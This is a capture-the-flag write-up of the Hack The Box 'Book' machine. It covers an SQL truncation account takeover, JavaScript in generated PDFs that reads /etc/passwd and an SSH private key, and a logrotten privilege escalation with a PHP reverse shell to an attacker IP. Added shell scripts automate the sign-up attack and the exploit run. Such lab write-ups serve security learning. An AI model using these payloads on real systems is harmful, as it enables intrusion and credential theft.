Hack the box - Book Write up

Derick Neriamparambil
6 min read · Jul 11, 2020


Book is a hard Linux machine in Hack the box which got retired very recently.

If you don't know what Hack The Box is: it is an online platform that lets us develop our pentesting skills on live machines and other challenges.


This is my first write-up on a HTB machine.

Let's start...

As usual, I started with an nmap scan.

Parallel to that task, I also initiated a directory search with the dirsearch tool.

From the initial enumeration, I found that port 80 is open (SSH on port 22 comes into play later on).

We have the option to sign up and sign in. Initially, I tried some basic SQL injection, but nothing happened. So I just signed up and took a stroll through the website. I was able to see a book submission portal with a file upload. I tried uploading some payloads through it, but nothing worked.

I was sure that the book submission portal had something important to do with the box, but nothing was happening here either.

When I inspected the page source of http://10.10.10.176/index, I found something interesting: the sign-up form's client-side validation limits the e-mail address to 20 characters.

Yeah!! That's my ticket.

Here, the address must not be longer than 20 characters, which matches the size of the column it is stored in. The trick is that the server checks whether an address is already registered by comparing the whole string I submit, but the database silently cuts the value down to 20 characters when it stores it. So if I submit a 21-character address that starts with admin@book.htb, the duplicate check finds no match, the truncated row ends up with the admin's address, and the password I supply during sign-up becomes a valid password for that address. This is a classic SQL truncation attack, and it can be used to set a new password for any known user.

I used Burp Suite to capture the sign-up request and alter the e-mail address to a 21-character one.

In the captured request (line 16 in the Burp view), after admin@book.htb I added spaces up to 20 characters followed by a "z" as the 21st character. The padding has to be spaces so that the stored, truncated value still compares equal to admin@book.htb (MySQL ignores trailing spaces when comparing VARCHAR values under its default PAD SPACE collations), and the last character has to be something other than a space so that the duplicate check sees a different string.

Once this account creation succeeded, I could log in with e-mail admin@book.htb and password admin, the one I had just set.
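As an added example (not part of the original write-up), the following shell script builds the 21-character address used above and submits it with curl. The sign-up endpoint and the form field names (name, email, password) are assumptions, since the page does not show the raw request.

```shell
#!/bin/sh
# Added example, not from the original write-up. Builds the 21-character
# address used in the SQL truncation sign-up and submits it with curl.
# Assumptions (not shown on the page): the sign-up form posts to TARGET and
# its fields are called name, email and password.

TARGET=${TARGET:-http://10.10.10.176/}
VICTIM=${VICTIM:-admin@book.htb}
MAXLEN=20     # the limit enforced client-side (and by the VARCHAR(20) column)

# pad_email ADDRESS: left-justify ADDRESS in a 20-character field, padding
# with spaces, then append one non-space character as the 21st.
#  - the duplicate check compares all 21 characters, so no row matches;
#  - the INSERT keeps only the first 20: the victim's address plus spaces;
#  - at login MySQL's default PAD SPACE collation ignores trailing spaces,
#    so the stored value compares equal to the victim's address.
# Padding with anything other than spaces, or ending with a space, breaks
# one of those three steps.
pad_email() {
    len=$(( $(printf '%s' "$1" | wc -c) ))
    if [ "$len" -gt "$MAXLEN" ]; then
        echo "address longer than $MAXLEN characters: $1" >&2
        return 1
    fi
    printf "%-${MAXLEN}s" "$1"
    printf 'z'
}

# signup_as PASSWORD: register a second account that collides with VICTIM.
signup_as() {
    email=$(pad_email "$VICTIM") || return 1
    curl -s -c cookies.txt \
        --data-urlencode "name=z" \
        --data-urlencode "email=$email" \
        --data-urlencode "password=$1" \
        "$TARGET" >/dev/null
    echo "submitted [$email] ($(( $(printf '%s' "$email" | wc -c) )) chars); now log in as $VICTIM / $1"
}

# Usage against the box (needs VPN access): sh truncate.sh run [password]
if [ "${1:-}" = run ]; then
    signup_as "${2:-admin}"
fi
```

After the request goes through, log in with the victim's real address and the password you passed in; the padded address itself is never needed again.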

I logged in as admin via http://10.10.10.176/admin, a path I got from the directory search.

After navigating through the admin pages, I found a few PDFs under Users and Collections.

After some research, I found the following attack and decided to try it: the admin's Collections PDFs are generated server-side from the details users submit, and if the PDF generator executes JavaScript, a script placed in a submission runs inside the converter and can read local files via file:// URLs, with their contents ending up in the rendered PDF.

From the user account's book submission portal, I entered the script below in the submission form and uploaded a dummy text file as the book.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

After checking the Collections PDF from the admin account, I found the PDF below.

Yes, it's working!!

In /etc/passwd we found a user named reader.

Then I decided to try extracting reader's SSH private key using the same method.

By default, a user's SSH private key lives at /home/<user>/.ssh/id_rsa, so for reader that is /home/reader/.ssh/id_rsa. I edited the script accordingly and sent the request again through the user profile:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

I used pdf2txt.py, the command-line tool that ships with the pdfminer Python library, to extract the text from the PDF file:

sudo python3 pdf2txt.py -o readerkey /home/d3r1c/HTB/Book/28942.pdf

This gives us reader's private key.

I copied the SSH key into a file named id_rsa, making sure the BEGIN/END lines and the line breaks of the PEM block survived the extraction, set its permissions with chmod 600 (ssh refuses keys that are readable by others), and then tried to access the box as reader over SSH:

ssh -i id_rsa reader@10.10.10.176

We own the user!

Now it's time to find a way to escalate privileges.

Here, I used a tool named "pspy", which snoops on the processes and cron jobs other users run, without needing root. You can install it from its GitHub repository.

Using Python's built-in HTTP server (SimpleHTTPServer / http.server) I downloaded pspy to the target machine and gave it execute permission.

From pspy's output I found that logrotate is being run periodically.

logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.

On GitHub, I found logrotten, an exploit for a race condition in logrotate's log rotation.

I copied the entire source into logrotten.c, set execute permission with "chmod 700 logrotten.c", and compiled it:

gcc -o logrotten logrotten.c

The binary is stored as logrotten.

After that, I created a file named payload containing a PHP reverse shell:

php -r '$sock=fsockopen("10.10.14.195",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

After that, I executed the logrotten binary with the payload against the log file being rotated:

./logrotten -p ./payload /home/reader/backups/access.log

A netcat listener was also set up on my machine (10.10.14.195) on port 1234 to catch the reverse shell.
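As an added example (not from the original write-up), the script below wraps the steps above in a shell script and first checks the two conditions the logrotten race depends on. The path of the logrotate config that rotates the log is passed in by the caller, because the page does not show it; the listener address 10.10.14.195:1234 and the log path are taken from the write-up.

```shell
#!/bin/sh
# Added example, not from the original write-up. Checks the preconditions
# the logrotten race depends on, then runs the same steps as above.
# Assumptions (not on the page): the path of the logrotate config that
# rotates the log is passed in by the caller; listener 10.10.14.195:1234.

LOG=${LOG:-/home/reader/backups/access.log}
LHOST=${LHOST:-10.10.14.195}
LPORT=${LPORT:-1234}

# logrotten_preflight LOGFILE CONFIG -> 0 if the race looks viable.
# logrotten waits for the rotation, renames the directory that holds the
# log and replaces it with a symlink, so that root's logrotate creates the
# "new" log (which then receives our payload) somewhere else. That needs:
#  - write permission on the parent of the log directory (to rename it),
#  - the "create" directive in the config, so logrotate writes a new file
#    at all.
logrotten_preflight() {
    log=$1; cfg=$2
    logdir=$(dirname "$log")
    parent=$(dirname "$logdir")
    if [ ! -f "$log" ]; then
        echo "no such log: $log" >&2; return 1
    fi
    if [ ! -w "$parent" ]; then
        echo "cannot rename $logdir: $parent is not writable" >&2; return 1
    fi
    if ! grep -Eq '^[[:space:]]*create' "$cfg"; then
        echo "$cfg has no 'create' directive" >&2; return 1
    fi
    echo "ok: $log is rotated with 'create' and $parent is writable"
}

# write_payload FILE: the reverse shell root will run, as in the write-up.
write_payload() {
    cat > "$1" <<EOF
php -r '\$sock=fsockopen("$LHOST",$LPORT);exec("/bin/sh -i <&3 >&3 2>&3");'
EOF
}

# run_exploit CONFIG: compile logrotten (source must be in the cwd) and
# start the race. logrotten drops the payload into /etc/bash_completion.d
# by default, so it only fires when root next opens an interactive bash
# shell, and the connection dies when that shell exits: keep the listener
# up (nc -lvnp $LPORT on the attacking host) and have one command ready.
run_exploit() {
    logrotten_preflight "$LOG" "$1" || return 1
    gcc -o logrotten logrotten.c
    write_payload ./payload
    ./logrotten -p ./payload "$LOG"
}

# Usage on the box: sh logrotten-run.sh run /path/to/logrotate.conf
if [ "${1:-}" = run ]; then
    run_exploit "$2"
fi
```

The preflight is cheap and saves a lot of waiting: if the parent directory is not writable the symlink swap can never happen, and without "create" logrotate never writes the file the payload is meant to land in.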

Once I got the reverse shell, which was not persistent, I ran the command below.

PS: I missed the reverse shell twice here, so the third time I was ready with the "cat" command:

cat /root/.ssh/id_rsa

Once I had this, I created a new file named book_id_rsa, copied the RSA key into it, and tried to log in as root using

ssh -i book_id_rsa root@10.10.10.176

We got the root!

Just let me know if you have any questions.

If you found this write-up useful, you can give me respect on HTB:

https://www.hackthebox.eu/home/users/profile/240146

You can connect with me on

LinkedIn: Derick N

Twitter: Derick N
